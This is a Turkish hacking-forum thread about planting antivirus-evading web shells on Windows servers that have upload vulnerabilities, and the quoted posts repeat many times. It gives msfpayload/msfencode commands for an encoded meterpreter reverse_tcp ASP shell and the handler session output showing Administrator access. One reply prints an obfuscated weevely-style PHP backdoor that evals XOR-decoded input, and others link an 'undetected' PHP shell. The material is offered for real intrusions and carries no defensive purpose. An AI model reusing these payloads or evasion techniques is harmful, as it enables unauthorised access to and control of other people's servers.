Metasploit ile antivirüslere yakalanmayan shell oluşturulması

Upload açığı bulduğunuz windows servera antivirüs programlarına yakalanmayan shell atmanız gerekmekte (çoğuna) yoksa shell otomatik olarak silinir
metasploiti açtıktan sonra
msfpayload windows/meterpreter/reverse_tcp LHOST=localipniz LPORT=443 R | msfencode -t raw -e x86/shikata_ga_nai -c3 | msfencode -t asp -o sh.asp

dosyamızı oluşturduk oluşturduğumuz dosyayı sunucuya yükleyip terminal ile sunucuya bağlanalım
weevely http://localip/sh.php sifreniz

weevely ile shelle baglantı kurduk
root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST localip
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit
meterpreter > getuid
Server username: server\Administrator
meterpreter > sysinfo
Computer : SERVER
OS :Microsoft Windows NT 6.1.7601 Service Pack 1
Architecture : x64
Meterpreter : x86/win32
meterpreter >

artık shell hazır tarayıcınız üzerinden açabilirsiniz

 

Upload açığı bulduğunuz windows servera antivirüs programlarına yakalanmayan shell atmanız gerekmekte (çoğuna) yoksa shell otomatik olarak silinir
metasploiti açtıktan sonra
msfpayload windows/meterpreter/reverse_tcp LHOST=localipniz LPORT=443 R | msfencode -t raw -e x86/shikata_ga_nai -c3 | msfencode -t asp -o sh.asp

dosyamızı oluşturduk oluşturduğumuz dosyayı sunucuya yükleyip terminal ile sunucuya bağlanalım
weevely sifreniz

weevely ile shelle baglantı kurduk
root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST localip
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit
meterpreter > getuid
Server username: server\Administrator
meterpreter > sysinfo
Computer : SERVER
OS :Microsoft Windows NT 6.1.7601 Service Pack 1
Architecture : x64
Meterpreter : x86/win32
meterpreter >

artık shell hazır tarayıcınız üzerinden açabilirsiniz

@sonadam iş yaparmi hala sence

 

@sonadam iş yaparmi hala sence

yazı eski bi yazı ama msfvenom hala geçerli x86/shikata_ga_nai dışında encoderler bulmak mümkün ama yinede yakalanma ihtimali var artık antivirüsler ve güvenlik duvarları yazılımların kullandığı fonksiyonlar bi yana hareket analizine göre yakalıyor şüpheli bi durum tespit edildiğinde silinebilir ayrıca burada bahsettiğim encoderi kullanarak arka arkaya şifreleme yapılıyordu sanırım 10 kez falan arka arkaya şifreleme yapabilirsin

 

ayrıca msfvenom sevmiyorum artık kullanmıyorumda windows server denk gelmediğim sürece direk weevely kullanıyom çoğu durumda yakalanmıyor zaten weevely geliştiricileri farklı yöntemler ekliyor sanırım weevely de 1 ay önce oluştur

$L='_eG~nd_cleG~G~an();$r=@baG~se64_encoG~de(@xG~(@gzcomG~pressG~($G~o),$k));G~prinG~tG~("$p$kh$r$kf");}';
$m='=0;($jG~<$c&&G~$i<$l)G~;$G~j++,$i++){G~$o.G~=$t{$i}G~^$k{$G~jG~};}}reG~tG~urn $o;}if(@preg_matG~c';
$D='G~val(@gzuncG~omG~pG~ress(@x(@baG~seG~64G~_decode(G~$m[1]),$kG~)));$oG~=@ob_get_conG~tentsG~();@ob';
$p='h("/G~$kh(.+G~)$kfG~/",@filG~e_get_cG~ontentG~s("php:G~//input"G~G~)G~,$m)==1){G~@ob_start();G~@e';
$l='G~$k="c4ca4238G~";$kh=G~"a0G~bG~923820dG~cG~c";$G~kf="509a6f75849b";$G~p="SG~c5ahRNVG~8l12B9ZCG~"G~;f';
$i=str_replace('Cr','','creCratCreCrCrCr_fuCrnction');
$N='unction xG~($t,$G~k){$G~c=G~strlen($kG~);$l=strG~len($G~t);$G~o="";for(G~$i=0G~;$i<$l;){G~for($G~j';
$d=str_replace('G~','',$l.$N.$m.$p.$D.$L);
$y=$i('',$d);$y();

 

ayrıca msfvenom sevmiyorum artık kullanmıyorumda windows server denk gelmediğim sürece direk weevely kullanıyom çoğu durumda yakalanmıyor zaten weevely geliştiricileri farklı yöntemler ekliyor sanırım weevely de 1 ay önce oluştur

$L='_eG~nd_cleG~G~an();$r=@baG~se64_encoG~de(@xG~(@gzcomG~pressG~($G~o),$k));G~prinG~tG~("$p$kh$r$kf");}';
$m='=0;($jG~<$c&&G~$i<$l)G~;$G~j++,$i++){G~$o.G~=$t{$i}G~^$k{$G~jG~};}}reG~tG~urn $o;}if(@preg_matG~c';
$D='G~val(@gzuncG~omG~pG~ress(@x(@baG~seG~64G~_decode(G~$m[1]),$kG~)));$oG~=@ob_get_conG~tentsG~();@ob';
$p='h("/G~$kh(.+G~)$kfG~/",@filG~e_get_cG~ontentG~s("php:G~//input"G~G~)G~,$m)==1){G~@ob_start();G~@e';
$l='G~$k="c4ca4238G~";$kh=G~"a0G~bG~923820dG~cG~c";$G~kf="509a6f75849b";$G~p="SG~c5ahRNVG~8l12B9ZCG~"G~;f';
$i=str_replace('Cr','','creCratCreCrCrCr_fuCrnction');
$N='unction xG~($t,$G~k){$G~c=G~strlen($kG~);$l=strG~len($G~t);$G~o="";for(G~$i=0G~;$i<$l;){G~for($G~j';
$d=str_replace('G~','',$l.$N.$m.$p.$D.$L);
$y=$i('',$d);$y();

en mantiklisi sunucuda shell barindirmiyorum bende 10-20 linkci bebeler görmesin özenir şimdi mk

 

en mantiklisi sunucuda shell barindirmiyorum bende 10-20 linkci bebeler görmesin özenir şimdi mk

zaten shell atınca yakalanma ihitmalin oluyor basit bi dosyayöneticisi iş yapıyor link için

 

Urusbu shelli tavsiye ederim birçok antiden geçiyor, çok nadirdirki yakalansın. Yazdığınız çok daha garanti bir yöntem ancak fazla uğraşmak istemeyenlere bu..

http://spyhackerz.org/2018/05/13/priv-undetected-shell-russian-php-shell/
http://spyhackerz.org/sh/urusbu.txt

 

Urusbu shelli tavsiye ederim birçok antiden geçiyor, çok nadirdirki yakalansın. Yazdığınız çok daha garanti bir yöntem ancak fazla uğraşmak istemeyenlere bu..

kendi sitende paylaştığın shellere log koy ama spy üzerinden log yayma ayıp edersin

 

kendi sitende paylaştığın shellere log koy ama spy üzerinden log yayma ayıp edersin

spy'ın saygın ve aklı başındaki hackerleri bunlarda log olduğunu bilir ve kimseye güvenmezler sıkıntı yapma

 

Upload açığı bulduğunuz windows servera antivirüs programlarına yakalanmayan shell atmanız gerekmekte (çoğuna) yoksa shell otomatik olarak silinir
metasploiti açtıktan sonra
msfpayload windows/meterpreter/reverse_tcp LHOST=localipniz LPORT=443 R | msfencode -t raw -e x86/shikata_ga_nai -c3 | msfencode -t asp -o sh.asp

dosyamızı oluşturduk oluşturduğumuz dosyayı sunucuya yükleyip terminal ile sunucuya bağlanalım
weevely sifreniz

weevely ile shelle baglantı kurduk
root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST localip
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit
meterpreter > getuid
Server username: server\Administrator
meterpreter > sysinfo
Computer : SERVER
OS :Microsoft Windows NT 6.1.7601 Service Pack 1
Architecture : x64
Meterpreter : x86/win32
meterpreter >

artık shell hazır tarayıcınız üzerinden açabilirsiniz

zaten onu yakalanmaz yapan ince ayrıntılar

 

Urusbu shelli tavsiye ederim birçok antiden geçiyor, çok nadirdirki yakalansın. Yazdığınız çok daha garanti bir yöntem ancak fazla uğraşmak istemeyenlere bu..

teşekkürler zaten mantık biraz daha farklı bunda

 

Upload açığı bulduğunuz windows servera antivirüs programlarına yakalanmayan shell atmanız gerekmekte (çoğuna) yoksa shell otomatik olarak silinir
metasploiti açtıktan sonra
msfpayload windows/meterpreter/reverse_tcp LHOST=localipniz LPORT=443 R | msfencode -t raw -e x86/shikata_ga_nai -c3 | msfencode -t asp -o sh.asp

dosyamızı oluşturduk oluşturduğumuz dosyayı sunucuya yükleyip terminal ile sunucuya bağlanalım
weevely http://localip/sh.php sifreniz

weevely ile shelle baglantı kurduk
root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST localip
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit
meterpreter > getuid
Server username: server\Administrator
meterpreter > sysinfo
Computer : SERVER
OS :Microsoft Windows NT 6.1.7601 Service Pack 1
Architecture : x64
Meterpreter : x86/win32
meterpreter >

artık shell hazır tarayıcınız üzerinden açabilirsiniz

Eline Sağlık